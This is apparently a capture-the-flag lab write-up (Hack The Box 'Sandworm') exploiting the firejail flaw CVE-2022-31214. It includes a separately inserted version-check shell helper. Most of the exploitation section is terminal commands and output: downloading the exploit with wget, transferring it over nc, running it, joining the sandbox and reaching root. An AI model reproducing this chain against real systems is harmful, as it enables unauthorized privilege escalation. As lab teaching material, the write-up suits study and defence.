CVE-2022-31214


A vulnerability, classified as critical, was found in firejail up to version 0.9.68. The affected code is an unknown part of the file join.c in the User Namespace Handler component. Manipulation with an unknown input leads to an access control vulnerability. The issue is classified as CWE-284: the software does not restrict, or incorrectly restricts, access to a resource from an unauthorized actor. The vulnerability impacts confidentiality, integrity, and availability.
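
As an added defender-side check, not part of the original writeup and not firejail's own code: a POSIX shell helper that compares a firejail version string against the affected range stated above (up to 0.9.68) and reports whether a host still needs the update. The `MAX_AFFECTED` boundary is taken from the advisory text; the assumption that `firejail --version` prints `firejail version X.Y.Z` on its first line is mine, so `check_local_firejail` labels it as such and falls back to reporting the raw output if that line is absent.

```shell
#!/bin/sh
# Affected range from the advisory text above: all releases up to and including 0.9.68.
MAX_AFFECTED="0.9.68"

# Compare two dotted version strings numerically on their first three fields.
# Prints "lt", "eq" or "gt". A packaging suffix such as "-2" or "~rc1" is
# stripped first; missing fields are treated as 0.
vercmp() {
  va="$(printf '%s' "$1" | sed 's/[^0-9.].*//').0.0"
  vb="$(printf '%s' "$2" | sed 's/[^0-9.].*//').0.0"
  i=1
  while [ "$i" -le 3 ]; do
    x=$(printf '%s' "$va" | cut -d. -f"$i"); x=${x:-0}
    y=$(printf '%s' "$vb" | cut -d. -f"$i"); y=${y:-0}
    if [ "$x" -lt "$y" ]; then echo lt; return 0; fi
    if [ "$x" -gt "$y" ]; then echo gt; return 0; fi
    i=$((i + 1))
  done
  echo eq
}

# True (exit 0) when the given version lies inside the affected range.
firejail_affected() {
  r=$(vercmp "$1" "$MAX_AFFECTED")
  [ "$r" = lt ] || [ "$r" = eq ]
}

# Inspect the locally installed firejail, if any. Exit codes: 0 = not in the
# affected range, 1 = affected, 2 = not installed or version not recognised.
check_local_firejail() {
  if ! command -v firejail >/dev/null 2>&1; then
    echo "firejail: not installed"
    return 2
  fi
  # Assumption (not verified against every release): the first line of
  # `firejail --version` reads "firejail version X.Y.Z".
  raw=$(firejail --version 2>/dev/null | sed -n '1p')
  v=$(printf '%s' "$raw" | sed -n 's/^firejail version //p')
  if [ -z "$v" ]; then
    echo "firejail: could not parse version from: $raw"
    return 2
  fi
  if firejail_affected "$v"; then
    echo "firejail $v: within affected range (<= $MAX_AFFECTED), update required"
    return 1
  fi
  echo "firejail $v: outside affected range"
  return 0
}

# Usage when run directly: report on this host.
check_local_firejail
```

The exit code makes the function usable from configuration-management or fleet-inventory scripts; only the version boundary is encoded, so the same helper applies to later firejail advisories by changing `MAX_AFFECTED`.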

Exploit


The author has attached the exploit.

┌──(kali㉿kali)-[~/archive/htb/labs/sandworm]
└─$ wget https://seclists.org/oss-sec/2022/q2/att-188/firejoin_py.bin
--2023-06-29 17:44:12--  https://seclists.org/oss-sec/2022/q2/att-188/firejoin_py.bin
Resolving seclists.org (seclists.org)... 45.33.49.119, 2600:3c01:e000:3e6::6d4e:7061
Connecting to seclists.org (seclists.org)|45.33.49.119|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8651 (8.4K) [application/octet-stream]
Saving to: ‘firejoin_py.bin’
 
firejoin_py.bin  100%[=========>]   8.45K  --.-KB/s    in 0s      
 
2023-06-29 17:44:13 (172 MB/s) - ‘firejoin_py.bin’ saved [8651/8651]
 
┌──(kali㉿kali)-[~/archive/htb/labs/sandworm]
└─$ mv firejoin_py.bin CVE-2022-31214.py

I downloaded the exploit script.

Exploitation


┌──(kali㉿kali)-[~/archive/htb/labs/sandworm]
└─$ nc $IP 2222 < CVE-2022-31214.py   
 
atlas@sandworm:/dev/shm$ nc -nlvp 2222 > CVE-2022-31214.py
Listening on 0.0.0.0 2222
Connection received on 10.10.14.4 33870
 
atlas@sandworm:/dev/shm$ chmod 755 CVE-2022-31214.py 

Delivery complete.

atlas@sandworm:/dev/shm$ ./CVE-2022-31214.py 
You can now run 'firejail --join=1048598' in another terminal to obtain a shell where 'sudo su -' should grant you a root shell.

Executing the exploit script starts a malicious service with PID 1048598. I’m supposed to join it from another session and switch to the root user.

atlas@sandworm:~$ ps 1048598
    PID TTY      STAT   TIME COMMAND
1048598 pts/3    s+     0:00 /usr/bin/python3 /dev/shm/./CVE-2022-31214.py

That’s the exploit service.

atlas@sandworm:~$ firejail --join=1048598
changing root to /proc/1048598/root
warning: cleaning all supplementary groups
Child process initialized in 10.50 ms

Joined.

Now, switching to the root user.

atlas@sandworm:~$ su root
root@sandworm:/home/atlas# whoami
root
root@sandworm:/home/atlas# hostname
sandworm
root@sandworm:/home/atlas# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.218  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 dead:beef::250:56ff:feb9:ed83  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:ed83  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:ed:83  txqueuelen 1000  (Ethernet)
        RX packets 3575031  bytes 650882102 (650.8 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 4262699  bytes 1809594963 (1.8 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 12308072  bytes 2191540766 (2.1 GB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 12308072  bytes 2191540766 (2.1 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System Level Compromise